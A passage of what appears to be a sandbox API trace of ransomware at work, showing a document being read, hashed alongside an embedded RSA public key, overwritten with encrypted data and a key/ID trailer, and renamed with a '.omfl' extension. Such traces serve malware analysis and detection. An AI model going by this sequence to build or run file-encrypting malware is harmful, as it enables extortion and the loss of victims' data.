out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.864] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.864] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.865] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.865] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x13ac8, lpOverlapped=0x0) returned 1 [0130.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.865] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.866] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.867] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.867] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.867] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.867] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.867] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.867] GetLastError () returned 0x0 [0130.867] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.867] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.867] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.867] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.867] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.867] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.867] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.867] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.867] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.867] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x13ad0) returned 0xdd35410 [0130.868] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.868] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34500 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16da0 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34548 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16db8 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16de8 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e00 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.868] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.869] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16de8 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e00 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e00 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16de8 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.869] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e00 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16de8 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.869] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0130.870] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.870] GetCurrentThreadId () returned 0x618 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d6790 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.870] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.870] GetCurrentThreadId () returned 0x618 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.870] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.870] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.870] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.870] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.870] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757ca08 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.870] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.871] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16de8 [0130.871] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0130.871] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e00 [0130.871] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.871] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16dd0 [0130.871] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.871] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.871] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.871] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e18 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16de8 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16de8 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16de8 | out: hHeap=0x4970000) returned 1 [0130.872] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.873] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e18 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e00 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16dd0 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16db8 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd34548 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0130.873] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.874] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.874] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.874] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.874] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.874] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.874] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.874] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.874] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x13ac3, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x13ac3, lpOverlapped=0x0) returned 1 [0130.874] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0130.874] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x13ac8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.875] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.875] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.875] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0130.875] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.875] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.875] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.875] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5d58 | out: hHeap=0x4970000) returned 1 [0130.875] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.875] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.875] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.875] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.875] CloseHandle (hObject=0x5c8) returned 1 [0130.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0130.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0130.881] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JCLv0n1SFc.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jclv0n1sfc.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JCLv0n1SFc.docx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jclv0n1sfc.docx.omfl")) returned 1 [0130.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.882] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0130.884] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, 